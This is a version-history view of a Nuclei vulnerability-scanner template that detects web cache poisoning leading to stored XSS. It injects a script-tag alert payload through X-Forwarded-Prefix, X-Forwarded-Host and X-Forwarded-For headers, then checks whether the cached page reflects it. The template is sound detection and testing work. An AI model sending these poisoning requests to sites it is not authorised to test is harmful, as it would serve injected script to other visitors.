daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/vulnerabilities/generic/cache-poisoning-xss.yaml

36 lines
1.0 KiB
YAML
Raw Normal View History

misc updates
2023-04-17 10:07:36 +00:00
id: cache-poisoning-xss
info:
name: Cache Poisoning - Stored XSS
author: melbadry9,xelkomy,akincibor
severity: high
reference:
- https://blog.melbadry9.xyz/fuzzing/nuclei-cache-poisoning
- https://portswigger.net/research/practical-web-cache-poisoning
- https://portswigger.net/web-security/web-cache-poisoning
tags: cache,generic,xss
variables:
cache_key: "{{to_lower(rand_base(6))}}"
cache_header: "{{to_lower(rand_base(6))}}"
xss_payload: '"></script><script>alert(document.domain);</script>'
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com>
2023-04-27 04:28:59 +00:00
http:
misc updates
2023-04-17 10:07:36 +00:00
- raw:
- |
GET /?{{cache_key}}=1 HTTP/1.1
Host: {{Hostname}}
X-Forwarded-Prefix: {{cache_header}}.xfp{{xss_payload}}
X-Forwarded-Host: {{cache_header}}.xfh{{xss_payload}}
X-Forwarded-For: {{cache_header}}.xff{{xss_payload}}
- |
GET /?{{cache_key}}=1 HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- contains(body_2, cache_header)
- contains(body_2, xss_payload)
condition: and